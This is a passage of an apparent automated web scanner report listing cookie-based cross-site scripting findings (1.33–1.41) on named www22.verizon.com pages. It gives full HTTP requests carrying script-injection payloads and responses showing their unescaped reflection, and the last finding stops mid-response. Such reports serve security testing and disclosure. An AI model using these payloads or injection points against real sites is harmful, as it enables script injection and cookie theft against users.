Expires: Mon, 13 Dec 2010 00:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX3915f<script>alert(1)</script>d024ec56917; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TX3915F<SCRIPT>ALERT(1)</SCRIPT>D024EC56917 . </span>
...[SNIP]...

1.33. http://www22.verizon.com/Content/LearnShop/Templates/Bundles/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/Bundles/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 3274c<script>alert(1)</script>68a8600749 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/Bundles/Overview.aspx?NRMODE=Published&NRNODEGUID=%7b0ECAE15E-8F92-465E-B27B-6897F0CAB2C4%7d&NRORIGINALURL=%2fresidential%2fbundles%2foverview&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3274c<script>alert(1)</script>68a8600749; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115028
Expires: Mon, 13 Dec 2010 00:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3274C<SCRIPT>ALERT(1)</SCRIPT>68A8600749 </DIV>
...[SNIP]...

1.34. http://www22.verizon.com/Content/LearnShop/Templates/Bundles/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/Bundles/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78091'><script>alert(1)</script>c6dc4ec7a51 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/Bundles/Overview.aspx?NRMODE=Published&NRNODEGUID=%7b0ECAE15E-8F92-465E-B27B-6897F0CAB2C4%7d&NRORIGINALURL=%2fresidential%2fbundles%2foverview&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX78091'><script>alert(1)</script>c6dc4ec7a51; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115034
Expires: Mon, 13 Dec 2010 00:53:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:35 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:35 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX78091'><SCRIPT>ALERT(1)</SCRIPT>C6DC4EC7A51 ' />
...[SNIP]...

1.35. http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 68a71<script>alert(1)</script>da0afcb6a72 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX68a71<script>alert(1)</script>da0afcb6a72; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121126
Expires: Mon, 13 Dec 2010 00:40:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(1)</script>da0afcb6a72; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TX68A71<SCRIPT>ALERT(1)</SCRIPT>DA0AFCB6A72 . </span>
...[SNIP]...

1.36. http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 70fc8<script>alert(1)</script>1d3cce5fce6 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX70fc8<script>alert(1)</script>1d3cce5fce6; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115125
Expires: Mon, 13 Dec 2010 00:40:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX70FC8<SCRIPT>ALERT(1)</SCRIPT>1D3CCE5FCE6 </DIV>
...[SNIP]...

1.37. http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7f21'><script>alert(1)</script>a7cbf3c061b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXf7f21'><script>alert(1)</script>a7cbf3c061b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115129
Expires: Mon, 13 Dec 2010 00:40:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:14 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF7F21'><SCRIPT>ALERT(1)</SCRIPT>A7CBF3C061B ' />
...[SNIP]...

1.38. http://www22.verizon.com/Residential/Bundles/Landing/FlexView/FlexView [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/FlexView/FlexView

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1d8c7'><script>alert(1)</script>654ef4cf9bc was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/FlexView/FlexView HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX1d8c7'><script>alert(1)</script>654ef4cf9bc; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69346
Expires: Mon, 13 Dec 2010 00:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1D8C7'><SCRIPT>ALERT(1)</SCRIPT>654EF4CF9BC ' />
...[SNIP]...

1.39. http://www22.verizon.com/Residential/Bundles/Landing/FlexView/FlexView [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/FlexView/FlexView

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 4ca2b<script>alert(1)</script>c43c6dd4a12 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/FlexView/FlexView HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX4ca2b<script>alert(1)</script>c43c6dd4a12; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69342
Expires: Mon, 13 Dec 2010 00:56:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:56 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4CA2B<SCRIPT>ALERT(1)</SCRIPT>C43C6DD4A12 </DIV>
...[SNIP]...

1.40. http://www22.verizon.com/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 421b7'><script>alert(1)</script>58009eb1a1 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX421b7'><script>alert(1)</script>58009eb1a1; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68261
Expires: Mon, 13 Dec 2010 00:57:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX421B7'><SCRIPT>ALERT(1)</SCRIPT>58009EB1A1 ' />
...[SNIP]...

1.41. http://www22.verizon.com/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload fd877<script>alert(1)</script>7b3f639e7b1 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/fios_online_nat/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXfd877<script>alert(1)</script>7b3f639e7b1; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68259
